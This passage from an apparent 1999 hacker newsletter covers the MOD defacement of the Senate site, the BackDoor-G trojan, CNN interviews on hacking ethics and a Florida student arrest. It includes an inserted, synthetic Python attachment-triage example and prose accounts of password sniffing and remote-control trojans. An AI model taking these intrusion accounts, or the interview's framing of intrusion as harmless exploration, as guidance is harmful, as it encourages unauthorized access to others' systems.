- loophole aka Elaich is also wanted for hacking
- Hybrid is wanted for telecommunications fraud

BHZ for Help Net Security
http://net-security.org

@HWA

16.0 MOD hacks Senate site
~~~~~~~~~~~~~~~~~~~~~

From http://www.maximumpcmag.com/

05.28.99 11:53
Hackers Add Senate To Victims

Hackers have added the U.S. Senate's main page to their list of owned web sites in an escalating war between the FBI and "crackers" around the globe. Hackers defaced the main page for the Senate late Thursday leaving the message: "The FBI may be all over the other groupz, like those gH and tK queerz, cl00bagz gal0re. M0D make th0se m0ronz l00k like a gr0up of special-ed st00dentz!@# FBI vs. M0D in '99, BR1NG IT 0N FUQRZ! (BTW NIPC IZ ALS0 0WNED)."

Members of the MOD group told security site Antionline that they gained access to another computer on the Senate's network, installed a sniffer, and swiped the administrators' passwords. On Friday, the Senate's page was still down but a mirror of the hacked site was kept on Antionline.

On Wednesday, an attack on the FBI's main page spooked the agency enough to take down its main page. The FBI's page also remained down Friday morning.

Related Story: FBI Site Attacked

FBI Site Attacked

The latest victim in a skirmish between hackers and the FBI may have been the brown-shoes' own web site.
The FBI's main web page remained offline Thursday afternoon while the Bureau checked it for security intrusions. The FBI reportedly took the page down Wednesday after someone attempted to hack it. The skirmish apparently began Wednesday morning when FBI agents in the Houston office raided the homes of hackers who allegedly belonged to a group called "gH." Agents did not arrest anyone but confiscated computers of numerous people. According to security news site, antionline.com, the FBI has also directed numerous ISPs to preserve backup tapes, logs, e-mail, and IRC conversations for about thirty individuals suspected of being hackers. Nando Times; Hackers take down FBI and Senate Internet sites Copyright © 1999 Nando Media Copyright © 1999 Associated Press By TED BRIDIS WASHINGTON (May 28, 1999 12:04 a.m. EDT http://www.nandotimes.com) - Computer hackers continued a series of electronic attacks against Internet sites of federal agencies on Thursday, defacing the Web page for the U.S. Senate before it was taken down. The Web site for the FBI also remained inaccessible late Thursday, a day after the agency said hackers tried unsuccessfully to compromise it. It was unclear when the FBI site might be made available again. "There was an attempt (Wednesday) by unknown persons to unlawfully gain access to the FBI.Gov Web site," according to a statement Thursday from the agency. "It was unsuccessful; however, as a precaution, the FBI shut down the site and is now taking additional steps to further insulate it." An obscene message left briefly on the Senate's Web site Thursday blamed the attack on what it said was the FBI's harassment of specific hacker groups, including the group that took credit for breaking into the White House site earlier this month. "Who laughs last? ...," the message said, adding that the intent was to send a monition "... to our friends at the FBI." 
Other federal Web sites, including those for the White House and the House of Representatives, appeared to be operating normally late Thursday. MSNBC reported that the attacks stemmed from the FBI's executing a search warrant on the home of a prominent hacker in Houston, Texas. FBI spokesman Rolando Moss confirmed that agents were investigating allegations of computer intrusions involving the Houston hacker. The FBI executed four search warrants that remained sealed, Moss said. Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer intrusion. Burns is reportedly known on the Internet as "Zyklon" and believed to be a member of the group that claimed responsibility for the attacks on the White House and the Senate sites. Federal prosecutors accused Burns of breaking into a computer between August 1998 and January 1999 in northern Virginia that is used by the U.S. Information Agency. "Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion. The grand jury also accused Burns of breaking into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics Inc. of Washington. CNN; Hackers react to FBI crackdown by invading Senate Web site May 27, 1999 Web posted at: 11:04 p.m. EDT (0304 GMT) WASHINGTON (CNN) -- Computer hackers reacted to an FBI crackdown by launching cyber assaults Thursday on government Web sites, including the one belonging to the U.S. Senate. People calling up the Senate Web site on Thursday were redirected to one belonging to the hackers. Posted on the site under the hackers' logo was the question: "Who laughs last?" The cyber intruders wrote that their Internet invasion of the legislative site was a way for them to thumb their noses at the FBI. 
Federal agents earlier this week executed search warrants on suspected hackers' homes in Dallas, Houston and other locations. FBI sources did not specify if anyone was arrested, but said they believe word of the raids quickly spread in the computer community. That attempt to crack down on computer hackers preceded a seemingly coordinated cyber attack that overloaded the FBI's own Web site, forcing the agency to shut down the site, officials said Thursday. FBI officials said their site was besieged with computer hits by scores of computer users who were apparently outraged over the raids. No virus was planted in the FBI site, but the sheer number of hits overloaded the system, said FBI spokesman Frank Scafidi, who described the incident as a "denial of service attack." He said the system has been shut down temporarily so additional firewalls can be erected to protect it. It was unclear when the site would be back up. The FBI's site contains general information about the agency and does not house sensitive information.

Justice Correspondent Pierre Thomas contributed to this report.

@HWA

17.0 Backdoor-G a new 'backorifice like' trojan and BO2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

Back Orifice, NetBus, and now BackDoor-G
contributed by N4vi11Us

Yet another Trojan horse that leaves MS Windows systems wide open has been discovered. This new backdoor tool is similar to Back Orifice or NetBus. NetBus is now a commercial shareware product. Back Orifice has undergone a major rewrite and a new version, BO2K, is expected to be released at this year's DefCon hacker convention. Once a system has had any one of these programs installed, it is wide open to unknown remote users, who have complete control over the system.
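All three tools named above get onto a box the same way: the victim runs an attachment that is really a Win32 executable, whether it is called a game update or a screen saver (a .scr file is an ordinary PE executable under another name). The following is an added example, not code from HWA, HNN, or Network Associates, of the mail-gateway triage a practitioner would run against such lures: it inspects the bytes for a PE header instead of trusting the filename, and flags double extensions and screen savers. The attachment names, the benign files and the minimal synthetic PE image are all constructed for the demonstration; no real trojan is involved.

```python
"""Attachment triage for Back Orifice / NetBus / BackDoor-G style lures.

Added example; the attachments below are constructed and the 'PE image'
is a synthetic header, not a real program.
"""
import struct

# Extensions Windows will execute on double-click.  A .scr "screen
# saver" is a normal PE executable that merely carries a different name.
EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd"}


def looks_like_pe(data: bytes) -> bool:
    """True if data has a DOS 'MZ' stub whose e_lfanew field (offset 0x3C)
    points at a 'PE\\0\\0' signature, i.e. a Win32 executable regardless of
    what the file is called."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def extensions(filename: str) -> list:
    """All dotted suffixes, lower-cased: 'vacation.jpg.exe' -> ['jpg', 'exe'],
    so the double-extension trick stays visible."""
    return filename.lower().split(".")[1:]


def triage(filename: str, data: bytes) -> dict:
    """Verdict for one attachment: is the content a PE, does the name claim
    to be executable, and why it is being quarantined (if it is)."""
    exts = extensions(filename)
    claims_exec = bool(exts) and exts[-1] in EXECUTABLE_EXTENSIONS
    is_pe = looks_like_pe(data)
    reasons = []
    if is_pe and not claims_exec:
        reasons.append("PE image behind non-executable name")
    if is_pe and len(exts) > 1 and claims_exec:
        reasons.append("double extension")
    if is_pe and exts and exts[-1] == "scr":
        reasons.append("screen saver is a Win32 executable")
    elif is_pe and claims_exec:
        reasons.append("executable attachment")
    return {"name": filename, "pe": is_pe, "claims_exec": claims_exec,
            "quarantine": is_pe, "reasons": reasons}


def fake_pe_image(payload: bytes = b"") -> bytes:
    """Smallest byte string that satisfies looks_like_pe(): 'MZ', e_lfanew
    = 0x40 written at offset 0x3C, then 'PE\\0\\0'.  Synthetic, never runs."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\0\0" + payload


# Constructed inbox modelled on the reported lures (hypothetical names).
SAMPLE_ATTACHMENTS = [
    ("cool_screensaver.scr", fake_pe_image()),           # the .scr lure
    ("quake2_update.exe", fake_pe_image()),              # "game update"
    ("vacation.jpg.exe", fake_pe_image()),               # double extension
    ("readme.txt", fake_pe_image()),                     # PE, harmless name
    ("notes.txt", b"Just text, nothing to see here.\n"), # benign
    ("logo.gif", b"GIF89a" + bytes(32)),                 # benign image
]


def triage_all(attachments=SAMPLE_ATTACHMENTS) -> list:
    """Run triage over a list of (filename, bytes) pairs."""
    return [triage(name, data) for name, data in attachments]


if __name__ == "__main__":
    for v in triage_all():
        flag = "QUARANTINE" if v["quarantine"] else "pass"
        print(f"{flag:10s} {v['name']:22s} {'; '.join(v['reasons'])}")
```

The decision key is `looks_like_pe`, not the extension list: the extension list only explains the verdict. A gateway that blocks on names alone passes `readme.txt` straight through, while checking the MZ/PE signature catches it and the renamed screen saver alike; an up-to-date scanner, as the article notes, is still needed to tell which PE it is.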
MSNBC
ZD Net

From MSNBC; http://www.msnbc.com/news/274094.asp

New Back Orifice-like Trojan found
BackDoor-G allows remote access to victim’s PC; Trojan horse arrives as spam with screen saver or game update
By Bob Sullivan
MSNBC

May 27 — Security researchers at Network Associates Inc. say they have found another Back Orifice-like Trojan Horse hack tool called BackDoor-G. The Trojan horse arrives in a user’s e-mail posing as a screen saver or game update, but once executed, it turns the victim’s PC into an “open client.” Then, a hacker can add, delete, move or execute files on the victim’s computer at will from anywhere on the Internet.

BackDoor-G is being sent out in spam mail, according to Sal Viveros, group marketing manager at Network Associates. The company discovered it Wednesday. Updated versions of virus scanning software, including Network Associates products, will detect BackDoor-G and clean it from a victim’s system.

Such “remote administration tools” started to surface last year when Back Orifice was released by a group calling itself the Cult of the Dead Cow. NetBus, another such tool, has since been developed into a commercial product by its author. With both programs, a victim is tricked into executing an e-mail attachment which then opens his PC to remote connections via the Internet. Once a victim is infected, a hacker can do anything to a machine that the victim can — including erasing all files or copying all files.

Such tools represent a dangerous blending of what might once have been considered relatively harmless pranks by virus writers and hackers, Viveros said. “We’re seeing these types of malicious code attacks, which are trying to attack information directly or indirectly,” he said. “Now we’re seeming to blur the lines between malicious code attacks and [data] vulnerability.”

BackDoor-G already has a variant — a very similar Trojan named “Armageddon” was discovered in France this morning.
Several Network Associates clients opened the attachment and exposed their systems, Viveros said. But when the promised screen saver did not execute, they called the virus company.

@HWA

18.0 [CNN] A Q&A with Emmanuel Goldstein, editor of 2600 magazine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I didn't see a date on the following interviews but they appear fairly timeless, so since I just found them I thought I'd share 'em with you... - Ed

http://www.cnn.com/TECH/specials/hackers/qandas/

Q&A with Emmanuel Goldstein of 2600: The Hacker's Quarterly

(CNN) -- Emmanuel Goldstein is the editor-in-chief of 2600: The Hacker Quarterly and hosts a weekly radio program in New York called "Off the Hook."

1. How do you define hacking?

Hacking is, very simply, asking a lot of questions and refusing to stop asking. This is why computers are perfect for inquisitive people -- they don't tell you to shut up when you keep asking questions or inputting commands over and over and over. But hacking doesn't have to confine itself to computers. Anyone with an inquisitive mind, a sense of adventure and strong beliefs in free speech and the right to know most definitely has a bit of the hacker spirit in them.

2. Are there legal or appropriate forms of hacking?

One of the common misconceptions is that anyone considered a hacker is doing something illegal. It's a sad commentary on the state of our society when someone who is basically seeking knowledge and the truth is assumed to be up to something nefarious. Nothing could be further from the truth. Hackers, in their idealistic naiveté, reveal the facts that they discover, without regard for money, corporate secrets or government coverups. We have nothing to hide, which is why we're always relatively open with the things we do -- whether it's having meetings in a public place or running a system for everyone to participate in regardless of background.
The fact that we don't "play the game" of secrets also makes hackers a tremendous threat in the eyes of many who want to keep things away from the public. Secrets are all well and good, but if the only thing keeping them a secret is the fact that you say it's a secret, then it's not really a very good secret. We suggest using strong encryption for those really interested in keeping things out of the hands of outsiders. It's interesting also that hackers are the ones who are always pushing strong encryption -- if we were truly interested in getting into everyone's personal affairs, it's unlikely we'd try and show them how to stay secure. There are, however, entities who are trying to weaken encryption. People should look toward them with concern, as they are the true threat to privacy. 3. What in your mind is the purpose of hacking? To seek knowledge, discover something new, be the first one to find a particular weakness in a computer system or the first to be able to get a certain result from a program. As mentioned above, this doesn't have to confine itself to the world of computers. Anyone who's an adventurer or explorer of some sort, or any good investigative journalist, knows the feeling of wanting to do something nobody has ever done before or find the answer despite being told that you can't. One thing that all of the people involved in these endeavors seem to share is the feeling from outsiders that they're wasting their time. 4. Are you a hacker? Why? Or why not? Absolutely. It's not something you can just erase from your personality, nor should you want to. Once you lose the desire to mess around with things, tweak programs and systems, or just pursue an answer doggedly until you get a result, you've lost a very important part of yourself. It's quite possible that many "reformed" hackers will lose that special ingredient as they become more and more a part of some other entity that demands their very souls. 
But for those who can resist this, or figure out a way to incorporate "legitimacy" into their hacker personalities without compromising them, there are some very interesting and fun times ahead. 5. What kind of hacking do you do? My main interest has always been phones and rarely does a day pass when I don't experiment in some way with a phone system, voice mail system, pay phone, or my own telephone. I've always been fascinated by the fact that we're only a few buttons away from virtually anyone on the planet and I hope that I never lose that sense of marvel. One of the most amazing things I ever got involved in was routing phone calls within the network itself -- known as blue-boxing. You can't do that as easily any more, but it was a real fun way to learn how everything was connected -- operators, services, countries, you name it. And in the not-too-distant past, there were so many different sounds phones made depending on where you were calling. Now they tend to be standardized rings, busies, etc. But the magic hasn't disappeared, it's just moved on to new things ... satellite technology, new phone networks and voice recognition technologies. Many times these new technologies are designed by the very people who were hacking the old technologies. The result is usually more security and systems that know what people will find useful. While I've spent a great deal of time playing with phones, I get the same sense of fun from computer systems and have invested lots of time exploring the Internet. It would fill a book to outline all of the hacker potential that exists out there. And, of course, there's radio hacking, which predates a lot of the current technology. It's gotten to the point where simply listening to a certain frequency has become a challenge. It's hard to believe that it's actually turned into a crime to listen to some of these non-scrambled radio waves. 
But this is the price we pay when people with no understanding of technology are the ones in charge of regulating it. 6. How much time do you spend at it a week? That's like asking how much time you spend breathing. It's always with you, you do more of it at certain times, but it's always something that's going on in your head. Even when I sleep, I dream from a hacker perspective. 7. Do you have a certain kind of site or "target" sites that most attract you? We don't sit around with a big map and a list of targets. In fact, we don't even sit around together. Most hacking is done by individuals who simply find things by messing around and making discoveries. We share that info and others add input. Then someone tells the press and the government that we're plotting to move satellites and all hell breaks loose. I think most of us tend to be drawn to the sites and systems that are said to be impossible to access. This is a normal human reaction to being challenged. The very fact that we continue to do this after so many of us have suffered so greatly indicates that this is a very strong driving force. When this finally becomes recognized as a positive thing, perhaps we'll really be able to learn from each other. 8. What, in general, do you think attracts people to hacking? People have always been attracted to adventure and exploration. Never before have you been able to get this without leaving your house and without regard to your skin color, religion, sex, or even the sound of your voice. On the Internet, everyone is an equal until they prove themselves to be a moron. And even then, you can always start over. It's the ability to go anywhere, talk to anyone, and not reveal your personal information unless you choose to -- or don't know enough not to -- that most attracts people to the hacker culture, which is slowly becoming the Internet culture. 
We find that many "mainstream" people share the values of hackers -- the value of free speech, the power of the individual against the state or the corporation, and the overall sense of fun that we embrace. Look in any movie where an individual is fighting a huge entity, and who does the audience without exception identify with? Even if the character breaks the rules, most people want him/her to succeed because the individual is what it's all about. 9. Do you know enough hackers personally to know what personality traits they share, if any? Hackers come from all different backgrounds and have all kinds of lifestyles. They aren't the geeks you see on television or the cyberterrorists you see in Janet Reno news conferences. They range in age from under 10 to over 70. They exist in all parts of the world, and one of the most amazing and inspiring things is to see what happens when they come together. It's all about technology, the thrill of discovery, and sharing information. That supersedes any personality issues that might be an issue in other circumstances. 10. Do you think hackers are productive and serve a useful purpose? I think hackers are necessary, and the future of technology and society itself (freedom, privacy, etc.) hinges on how we address the issues today that hackers are very much a part of. This can be the dawning of a great era. It can also be the beginning of true hell. 11. What percentage would you say are destructive as opposed to those in it out of intellectual curiosity or to test their skills? This raises several points that I feel strongly about. For one thing, hacking is the only field where the media believes anyone who says they're a hacker. Would you believe someone who said they were a cop? Or a doctor? Or an airline pilot? Odds are they'd have to prove their ability at some point or say something that obviously makes some degree of sense. 
But you can walk up to any reporter and say you're a hacker and they will write a story about you telling the world that you're exactly what you say you are without any real proof. So every time a movie like "Hackers" comes out, 10 million people from AOL send us e-mail saying they want to be hackers, too, and suddenly, every 12-year-old with this sentiment instantly becomes a hacker in the eyes of the media and hence, the rest of society. You don't become a hacker by snapping your fingers. It's not about getting easy answers or making free phone calls or logging into someone else's computer. Hackers "feel" what they do, and it excites them. I find that if the people around you think you're wasting your time but you genuinely like what you're doing, you're driven by it, and you're relentless in your pursuit, you have a good part of a hacker in you. But if you're mobbed by people who are looking for free phone calls, software or exploits, you're just an opportunist, possibly even a criminal. We already have words for these people and it adequately defines what they do. While it's certainly possible to use hacking ability to commit a crime, once you do this you cease being a hacker and commence being a criminal. It's really not a hard distinction to make. Now, we have a small but vocal group who insist on calling anyone they deem unacceptable in the hacker world a "cracker." This is an attempt to solve the problem of the misuse of the word "hacker" by simply misusing a new word. It's a very misguided, though well-intentioned, effort. The main problem is that when you make up such a word, no further definition is required. When you label someone with a word that says they're evil, you never really find out what the evil was to begin with. Murderer, that's easy. Burglar, embezzler, rapist, kidnapper, all pretty clear. Now along comes cracker and you don't even know what the crime was. It could be crashing every computer system in Botswana. 
Or it could be copying a single file. We need to avoid the labeling and start looking at what we're actually talking about. But at the same time, we have to remember that you don't become a hacker simply because you say you are. 12. Do people stay in hacking a long time, or is it the kind of thing that people do for a few years and then move on to something else? It can be either. I tend to believe that it's more of a philosophy, a way of looking at something. When you have the hacker perspective, you see potential where others don't. Also, hackers think of things like phones, computers, pagers, etc., as toys and things to be enjoyed whereas others see work and responsibility and actually come to dread these things. That's why hackers like to hold onto their world and not become part of the mainstream. But it certainly can and does happen. 13. What is the future of hacking? As long as the human spirit is alive, there will always be hackers. We may have a hell of a fight on our hands if we continue to be imprisoned and victimized for exploring, but that will do anything but stop us. 14. Given increased attention to corporate and government security, is it getting tougher to hack or not? Hacking isn't really about success -- it's more the process of discovery. Even if real security is implemented, there will always be new systems, new developments, new vulnerabilities. Hackers are always going to be necessary to the process and we're not easily bored. 15. Is the possibility of being identified and even prosecuted an issue for most hackers? Hackers make very bad criminals. This is why we always wind up being prosecuted. We don't hide very well or keep our mouths sealed shut to protect corporate or government interests. But the same security holes would exist even if we weren't around, so I think the hackers should be properly seen as messengers. 
That doesn't mean that you should expect them to just hand over all of their knowledge -- it's important to listen and interpret on your own, as any hacker would.

16. Are there hackers who are up for hire? What are they paid? Who hires them, and for what?

Just as you can use hacker ability to attain a life of crime, you can use that ability to become a corporate success. Some are able to hold onto their hacker ideals. Others, sadly, lose them. It's especially hard when young people who haven't worked it all out yet are approached and tempted with huge amounts of money by these entities. It can be very hard to resist and the cost is often greater than anticipated.

17. Have you had any contact with people you consider cyberterrorists? Do you endorse what they do?

In all of the time I've been in the scene, which is a pretty long time, I've never come across anyone I consider to be a "cyberterrorist," whatever that is. Most people who talk of such creatures either have something to sell or some bill to pass. This is not to say that such a concept is impossible. But I believe the current discussions aren't based in reality and have very suspicious ulterior motives.

18. What about the people who hack into Pentagon sites? Do you think they should be punished?

According to the Pentagon, there is no risk of anything classified being compromised because it's not on the Internet. If they were wrong, I would like to see someone prove that. If a non-classified site is hacked, I don't see the harm unless something is damaged in some way. Remember, the security hole was already there. If a hacker finds it, it's far more likely the people running the system will learn of the hole. If a criminal or someone with an ulterior motive (espionage, etc.) finds the hole first, it's likely to remain secret for much longer and the harm will be far greater.
While you may resent the fact that some 14-year-old from Topeka proved your security sucks, think of what could have happened had you not learned of this and had someone else done it instead. I'm the first to say that people who cause damage should be punished, but I really don't think prison should be considered for something like this unless the offender is a true risk to society. The great majority of these cases do not involve damage or vandalism, a fact that largely goes unreported. What people have to remember is that most of the time, this is simply an example of kids being kids and playing games like they have always done. Obviously, the tools have changed, but that's really not something the kids are responsible for. If some kid somewhere can access your medical records or your phone records, he or she is not the one who put them there. The true violator of your privacy is the person who made the decision to make them easily accessible.

19. Your real name is Eric Corley. Why do you use the name Emmanuel Goldstein?

I believe everyone should be given the opportunity to name themselves. That name should reflect something about who you are and what you believe in and stand for. Emmanuel Goldstein is that for me, and for those who want to learn why, get a copy of George Orwell's "1984" and see for yourself. Interestingly, our first issue of 2600 was published in January 1984. A complete coincidence.

19.0 [CNN] 'Hacking is a felony': Q&A with IBM's Charles Palmer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cnn.com/TECH/specials/hackers/qandas/

Q&A with IBM's Charles Palmer

(CNN) -- Dr. Charles C. Palmer is the manager of Network Security and Cryptography and head of the Global Security Analysis Lab, which includes IBM's ethical hacking unit.

1. How do you define hacking?

Hacking is unauthorized use of computer and network resources. (The term "hacker" originally meant a very gifted programmer.
In recent years though, with easier access to multiple systems, it now has negative implications.)

2. Are there appropriate forms of hacking?

Hacking is a felony in the United States and most other countries. When it is done by request and under a contract between an ethical hacker and an organization, it's OK. The key difference is that the ethical hacker has authorization to probe the target.

3. What do you and the other members of your team do?

(We) work with IBM Consulting and its customers to design and execute thorough evaluations of their computer and network security. Depending on the evaluation they request (ranging from Web server probes to all-out attacks), we gather as much information as we can about the target from publicly available sources. As we learn more about the target, its subsidiaries and network connectivity, we begin to probe for weaknesses. Examples of weaknesses include poor configuration of Web servers, old or unpatched software, disabled security controls, and poorly chosen or default passwords. As we find and exploit vulnerabilities, we document if and how we gained access, as well as if anyone at the organization noticed. (In nearly all the cases, the Information Systems department is not informed of these planned attacks.) Then we work with the customer to address the issues we've discovered.

4. What is the background of the people on your team?

We have Ph.D.s in physics, computer scientists, and even one former photographer with a fine arts degree. They are all well-known, highly respected system security professionals from around the world. Most of them did not start their careers in this area, but ended up doing computer and network security because they were provoked by hackers at one time. Once they started on the road to improving security, they got hooked on the challenges it presents.

5.
In "Helpful Hacking" from IBM Research magazine in 1997, you are quoted as saying you don't hire reformed hackers and "there's no such thing." Could you explain?

The number of really gifted hackers in the world is very small, but there are lots of wannabes.... When we do an ethical hack, we could be holding the keys to that company once we gain access. It's too great a risk for our customers to be put in a compromising position. With access to so many systems and so much information, the temptation for a former hacker could be too great -- like a kid in an unattended candy store.

6. Is it fair to say that you are opposed to hacking?

As I said before, hacking is a felony -- for good reason. Some of the "joyriders" -- hackers who access systems just for the challenge -- think it's harmless since they usually don't "do" anything besides go in and look around. But if a stranger came into your house, looked through everything, touched several items, and left (after building a small, out of the way door to be sure he could easily enter again), would you consider that harmless? These joyriders could be causing damage inadvertently since just by their presence they are using system resources.

7. Do you think hacking can be useful?

Hacking can be useful in a controlled environment where there are ground rules and contractual agreements.

8. Do you have a profile of the typical hacker?

The profile has broadened in the last couple of years to include many types of people, which makes it very difficult to call out a "typical" hacker. The motivations behind hacking have changed (see Answer No. 11 below). No longer are hackers limited to the teen-age, soda-slurping misfits, although they're probably the majority. There are girls and even younger kids. Many companies think all hackers come from outside, but surveys continue to show that the threat from inside an organization is greater than from outside.
So if your system is compromised, it could be a Gen-Xer sitting in a dark apartment, or the woman in the cubicle next to you.

9. There have been reported instances where corporate security personnel have tracked hacking back to the source, broken in and stolen computers, or even used force. Do you endorse "vigilantism" as a response to hacking?

I've heard those stories, too, and I don't believe most of them. It makes zero sense to respond to an illegal attack with another illegal attack. First of all, it can be very difficult to accurately determine where an attack comes from. Whether they end up retaliating against the right or wrong person, they've committed a felony and are just as guilty as the original perpetrator. It's no different than other forms of vigilante justice.

10. What about attacking Web sites that list hacking scripts?

Again, any attack is a felony. It's a First Amendment rights issue as well. Where do you draw the line? Attacking adult sites? Attacking spammers? It makes more sense for corporations, schools and other organizations to try to block access to those sites.

11. Can you characterize the nature of most hacking attacks?

A few years ago, the original motivations were pursuit of knowledge and the desire to "show off" one's skills. Now, there are new lures of money and power. However, the statistics can be misleading, so many of these incidents go unreported due to lack of detection or fear of further losses due to tarnished image and credibility. I believe that the majority of hacks are still motivated by curiosity and a desire to point out system weaknesses. However, as organizations have been finding, most of today's threats come from within the organization. According to a recent META Group study, current figures indicate that recent breaches of security within Information Technology organizations occur internally 58 percent of the time. The threat from the outside is rising at a steady rate, though.

12.
Is there a trend in these attacks?

Denial-of-service attacks and macro-viruses are the most popular hacker activities. The denial-of-service attacks are fairly easy for hackers of all skill levels -- from "script-kids" to professionals -- to launch. This is a situation where a company's Web site or online service is simply made unavailable by a hacker overtaxing the system resources. It doesn't sound that harmful, but there can be serious monetary and image losses attached to this. If you want to buy a book and you go to a popular book-selling Web site and find that site unavailable, chances are you'll try the next most popular book Web site. There's simply too much competition on the Internet right now to overlook security needs. These denial-of-service attacks are particularly troubling because they are hard to defend against. There are defenses available with firewall products from IBM and other companies, but there can be denial-of-service attacks from inside as well, which lends credence to the argument for Intranet firewalls.

13. Where does the real threat of hacking lie: in the private sector, in government or somewhere else?

The widely reported attacks against government sites are troubling, but it's a good bet that the government would not have any sensitive information on a machine connected to the Internet. An unfortunate side effect of these reports is that people end up thinking that securing systems and networks is hard. It's not hard, but it does take time and training, and it's an ongoing process to stay one step ahead of the bad guys. Corporate espionage is also a threat, but not in the glamorous way portrayed in the movies. There, the threat is from the inside. There have been many reports of employees purposely sending proprietary information outside the company to other companies, perhaps just before they themselves move to that company. The greater connectivity that employees have today also leads them to inadvertent leaks via e-mail.

14.
To what extent is cyberterrorism a genuine concern?

There is little motivation for industrial control systems like those running nuclear plants or airports to be on the open Web. They may have dial-up access or private networks within the organization that would be susceptible to attack from the inside. IBM has found that it can be quicker and cheaper to attack a target physically, rather than digitally -- we've nonchalantly walked into businesses, snooped around, and walked out with confidential material (once with the security guard holding the door for us!). And there are many examples of unfortunate accidents that resulted in very effective "attacks." The most common example is the "backhoe attack," where an errant heavy-equipment operator accidentally cut a communications cable. ... I don't think we are "at war," because in this problem the enemy includes ourselves. We view it more as a race -- we're all trying to stay a few steps ahead of the threats ... through improved education and technology. ... The good news is that people are thinking about these issues, and some groups appear to be taking action.

15. What about responses such as the recent Pentagon counteroffensive that redirected hackers' attack to an applet that caused their browsers to crash? Is that an appropriate response to hackers?

Anytime you acknowledge the hacker, you run the risk of heightening his or her interest. If you change the game from solitaire to a real poker game with human opponents, it becomes more interesting to most hackers. Such retaliation is also short-lived, since countermeasures will quickly be developed and publicized around the Web. In my opinion, this is not an effective usage of limited security personnel.

16. Are anti-hacking measures improving?

The most important improvement is in the area of awareness. ...
Advances in firewall technology (making them easier to install and configure), improvements in vulnerability scanning and better explanations of how to repair them, and better intrusion-detection with fewer false-positives are all key technologies in this race.

17. If attacks can only take place on computers that are online, to what extent could hacking be mitigated by keeping sensitive materials, data, etc., offline?

One of my colleagues at IBM likes to say, "only trust physics." My version is that the only 100 percent, truly secure system is one that is powered-off and filled with concrete. The military has long understood the security of an "air gap" (where a secure machine has no connection whatsoever to an unsecured machine), and we recommend to our customers that they consider such an arrangement for their most secure systems. This comes down to risk-analysis -- that is, weighing the cost in convenience and availability against the threat of having a system online. If it's important to ... your business to have data available online inside the company, then protecting it with an internal firewall makes sense. ... If you have a Web server you want your customers to access, you can't hide it behind your corporate firewall because they won't be able to get to it. There are network designs that will enable you to position the Web server on the "outside," while securely maintaining a connection between it and, perhaps, a server behind the firewall.

18. What is the long-term outlook for hacking?

As long as there are unsecured computers with interesting stuff on them, there will be hackers. Law enforcement agencies have stepped up their facilities and training programs to meet the demand for computer and network security. Moving toward technologies that use strong encryption will greatly improve the overall security of systems.
Virtual Private Networks are a fantastic tool for companies and governments to protect their systems and networks while taking advantage of the low-cost, high-availability offered by the Internet. Internet standards bodies are also moving toward designing security into new standards. Most kids today know much more about computers than their parents do, and some start "messing around" at earlier ages than in the past. The best thing we can do is to show them how interesting it can be to work at protecting systems and networks.

19. What about the outlook for computer security?

While better security technologies are appearing all the time, education and awareness will continue to be the limiting factor. System administrators must learn about and maintain their systems securely. Users have to understand their security responsibilities (like choosing good passwords, not installing unauthorized modems, etc.). ... Innovations like biometrics and smart cards will go a long way toward making security easier for the end user as well as for the system administrators.

@HWA

20.0 Five Busted in Florida
~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by squid stupid

It has been hard to nail down specific information but a few local news outlets in Florida are reporting that four students of Flagler Palm Coast High School may face a slew of criminal charges for unlawful computer access. The suspects have been accused of deleting grade files and compromising exams on their school computer system.

Yahoo News
http://dailynews.yahoo.com/headlines/local/state/florida/story.html?s=v/rs/19990526/fl/index_6.html#11

Student Hackers Arrested - (BUNNELL) -- Five Flagler Palm Coast High School students... including the son of a Bunnell city commissioner... are facing a litany of criminal charges after allegedly using a computer virus to hack into the school's network and commandeer files. No grades were changed but grade files were deleted and exams compromised.
The virus was discovered last month during a software upgrade. The school's computer experts also found that each of the five students had downloaded a ``hacker tool'' from the Internet into their personal computer accounts. They've been suspended for the rest of the year... but the students will be allowed to take their final exams next month. Prosecutors have not decided if they will file criminal charges.

From ISN mailing list

Date: Thu, 27 May 1999 02:58:09 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] Five arrested for hacking into high school system

Forwarded From: bluesky@rcia.com

May 26, 1999

Five arrested for hacking into high school system

By MATT GOWEN

BUNNELL - Five Flagler Palm Coast High School students - one the son of a Bunnell city commissioner - are facing a litany of criminal charges after authorities said they used a computer virus to hack into the school's network and commandeer teacher and student files.

Flagler County sheriff's deputies arrested the students Monday. All five were taken to the Division of Youth Services in Daytona Beach before being released to their parents.

Facing the brunt of the allegations are Steven Alverson, 17, and Daniel Bixby, 16, both of Palm Coast. Alverson was charged with 16 separate felony counts, eight for crimes involving computers and eight for crimes against computer users. Bixby was charged with 12 similar counts.

Alverson and Bixby were suspended until the end of the school year, June 4.

Arrested on two felony charges each were Yen Chen, 16, and Henry Cervantes, 17, both of Palm Coast, and Daniel Dupont, 17, of Bunnell, son of City Commissioner Catherine Robinson.

School officials gave Chen, Cervantes and Dupont in-school suspension until the end of the year. The five will be allowed to return to take final exams June 7 and 8.

As for the criminal case, the State Attorney's Office will now decide whether formal charges should be filed.
The arrests capped a lengthy investigation into the presence of the virus - a disabling computer program that gave the students access to teacher grade books and to exams on the system, according to reports.

The virus was initially discovered April 8 by technology support personnel who were upgrading the school's protective software. In a subsequent investigation, reports said, the school's computer experts found that each of the five students had downloaded a "hacker tool" from the Internet into their personal computer accounts.

FPCHS Assistant Principal Allan Haller said no grades were changed but that grade files were deleted and exams were compromised.

"It was more mischievous than anything else," Haller said.

